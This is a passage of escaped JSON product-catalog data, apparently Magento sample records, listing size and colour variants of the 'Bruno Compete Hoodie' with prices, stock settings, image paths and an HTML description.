stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},{\"sku\":\"MH03-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-M-Blue\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},{\"sku\":\"MH03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-M-Green\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},{\"sku\":\"MH03-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-L-Black\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},{\"sku\":\"MH03-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-L-Blue\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},{\"sku\":\"MH03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-L-Green\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},{\"sku\":\"MH03-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XL-Black\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},{\"sku\":\"MH03-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XL-Blue\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},{\"sku\":\"MH03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XL-Green\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},{\"sku\":\"MH03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, 